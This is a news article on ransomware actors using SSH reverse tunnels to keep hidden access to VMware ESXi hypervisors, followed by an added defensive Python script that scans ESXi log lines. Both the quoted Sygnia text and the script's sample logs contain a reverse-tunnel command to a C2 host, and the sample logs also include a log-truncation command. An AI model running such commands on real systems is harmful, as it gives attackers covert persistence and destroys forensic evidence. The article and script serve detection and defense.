Ransomware gang uses SSH tunnels for stealthy VMware ESXi access
Ransomware actors targeting ESXi bare metal hypervisors are leveraging SSH tunneling to persist on the system while remaining undetected.
VMware ESXi appliances play a critical role in virtualized environments, since a single physical server can host many of an organization's virtual machines.
They are largely unmonitored and have been a target for hackers looking to access corporate networks where they can steal data and encrypt files, thus crippling an entire business by rendering all virtual machines inaccessible.
Cybersecurity company Sygnia reports that in many cases the compromise is achieved by exploiting known flaws or using compromised administrator credentials.
SSHing into the hypervisor
ESXi features a built-in SSH service that allows administrators to remotely manage the hypervisor via a shell.
Sygnia says that ransomware actors abuse this feature to establish persistence, move laterally, and deploy ransomware payloads. Since many organizations do not actively monitor ESXi SSH activity, attackers can use it stealthily.
“Once [the hackers are] on the device, setting up the tunneling is a simple task using the native SSH functionality or by deploying other common tooling with similar capabilities,” explains Sygnia.
“For example, by using the SSH binary, a remote port-forwarding to the C2 server can be easily set up by using the following command: ssh -fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>”
“Since ESXi appliances are resilient and rarely shut down unexpectedly, this tunneling serves as a semi-persistent backdoor within the network.”
Gaps in logging
Sygnia also highlights challenges in monitoring ESXi logs, which lead to significant visibility gaps that ransomware actors know how to take advantage of.
Unlike most systems where logs are consolidated in a single syslog file, ESXi distributes logs across multiple dedicated log files, so finding evidence requires piecing together information from multiple sources.
The security firm suggests that system admins look into these four log files to detect SSH tunneling and ransomware activity:
- /var/log/shell.log → Tracks command execution in ESXi Shell
- /var/log/hostd.log → Logs administrative activities and user authentication
- /var/log/auth.log → Captures login attempts and authentication events
- /var/log/vobd.log → Stores system and security event logs
The hostd.log and vobd.log files are also likely to contain traces of firewall rule modifications, which attackers need in order to allow persistent SSH access.
It should be noted that ransomware actors often clear logs to erase evidence of SSH access, modify timestamps, or truncate logs to confuse investigators, so finding evidence isn’t always straightforward.
Ultimately, it is recommended that organizations centralize ESXi logs via syslog forwarding and integrate logs into a Security Information & Event Management (SIEM) system to detect anomalies.
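The following is an added example, not code from Sygnia or BleepingComputer, showing how a defender might run simple detections over the four log files named above once they have been forwarded off the host. The sample log lines are constructed for the example and only loosely imitate real ESXi formats; the management network (MGMT_NET), the rule names and the exact line layouts are assumptions to adapt to your own environment.

```python
"""Scan forwarded ESXi log lines for SSH-tunnel and persistence indicators."""
import ipaddress
import re
import shlex
from dataclasses import dataclass

# Assumption for this example: SSH logins from outside this management
# network are treated as suspicious. Adjust to your environment.
MGMT_NET = ipaddress.ip_network("10.10.0.0/24")


@dataclass
class Finding:
    logfile: str
    rule: str
    line: str


# Constructed sample lines, modelled loosely on the four ESXi log files the
# article names. They are illustrative, not captured from a real host.
SAMPLE_LOGS = {
    "/var/log/shell.log": [
        "2025-01-20T10:02:11Z shell[2097152]: [root]: esxcli network firewall ruleset set --ruleset-id sshServer --enabled true",
        "2025-01-20T10:02:40Z shell[2097152]: [root]: ssh -fN -R 127.0.0.1:1080 user@203.0.113.10",
        "2025-01-20T10:05:02Z shell[2097152]: [root]: ls /vmfs/volumes",
        "2025-01-20T11:40:09Z shell[2097152]: [root]: > /var/log/auth.log",
    ],
    "/var/log/auth.log": [
        "2025-01-20T10:01:55Z sshd[2097100]: Accepted password for root from 198.51.100.7 port 51234 ssh2",
        "2025-01-20T09:30:12Z sshd[2097088]: Accepted publickey for root from 10.10.0.5 port 50111 ssh2",
    ],
    "/var/log/hostd.log": [
        "2025-01-20T10:02:12Z info hostd[2097200] [Originator@6876 sub=Hostsvc] Firewall ruleset sshServer enabled",
    ],
    "/var/log/vobd.log": [
        "2025-01-20T10:01:56Z: [UserLevelCorrelator] 12345us: [esx.audit.ssh.session.opened] SSH session was opened for 'root@198.51.100.7'.",
    ],
}

# shell.log: "shell[pid]: [user]: <command>" (assumed layout)
SHELL_CMD_RE = re.compile(r"shell\[\d+\]: \[(?P<user>[^\]]+)\]: (?P<cmd>.+)$")
ACCEPTED_RE = re.compile(r"Accepted \S+ for (?P<user>\S+) from (?P<ip>[\d.]+)")
FIREWALL_RE = re.compile(r"esxcli network firewall\b")
# Clearing, truncating or timestamp-rewriting of logs, as the article describes
LOG_TAMPER_RE = re.compile(r"(^>\s*/var/log/|\b(rm|truncate)\b.*/var/log/|\btouch\s+-[dt]\b)")
HOSTD_FW_RE = re.compile(r"[Ff]irewall.*ruleset")
VOBD_SSH_RE = re.compile(r"esx\.audit\.ssh\.session\.opened")


def ssh_forwarding_flags(cmd: str) -> set[str]:
    """Return the SSH flags in cmd that create reverse (-R) or dynamic (-D) forwarding."""
    try:
        argv = shlex.split(cmd)
    except ValueError:
        argv = cmd.split()
    if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
        return set()
    # Single-dash option clusters such as "-fNR" or "-R"; long options are skipped
    return {f for tok in argv[1:] if tok.startswith("-") and not tok.startswith("--")
            for f in tok[1:] if f in "RD"}


def scan_shell(logfile: str, line: str, findings: list[Finding]) -> None:
    m = SHELL_CMD_RE.search(line)
    if not m:
        return
    cmd = m.group("cmd")
    if ssh_forwarding_flags(cmd):
        findings.append(Finding(logfile, "ssh_reverse_or_dynamic_tunnel", line))
    if FIREWALL_RE.search(cmd):
        findings.append(Finding(logfile, "firewall_change", line))
    if LOG_TAMPER_RE.search(cmd):
        findings.append(Finding(logfile, "log_tampering", line))


def scan_auth(logfile: str, line: str, findings: list[Finding], mgmt_net) -> None:
    m = ACCEPTED_RE.search(line)
    if m and ipaddress.ip_address(m.group("ip")) not in mgmt_net:
        findings.append(Finding(logfile, "ssh_login_outside_mgmt_net", line))


def scan_logs(logs: dict[str, list[str]], mgmt_net=MGMT_NET) -> list[Finding]:
    """Apply the per-file rules and return every matching line as a Finding."""
    findings: list[Finding] = []
    for logfile, lines in logs.items():
        name = logfile.rsplit("/", 1)[-1]
        for line in lines:
            if name == "shell.log":
                scan_shell(logfile, line, findings)
            elif name == "auth.log":
                scan_auth(logfile, line, findings, mgmt_net)
            elif name == "hostd.log" and HOSTD_FW_RE.search(line):
                findings.append(Finding(logfile, "firewall_change", line))
            elif name == "vobd.log" and VOBD_SSH_RE.search(line):
                findings.append(Finding(logfile, "ssh_session_opened", line))
    return findings


if __name__ == "__main__":
    for f in scan_logs(SAMPLE_LOGS):
        print(f"{f.logfile}: {f.rule}: {f.line}")
```

Because the article notes that attackers clear or truncate these files on the host itself, the rules are only useful against copies already forwarded by syslog to a collector or SIEM; a firewall change followed shortly by an SSH login from outside the management network and an ssh command with -R or -D is the sequence worth correlating.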
source: BleepingComputer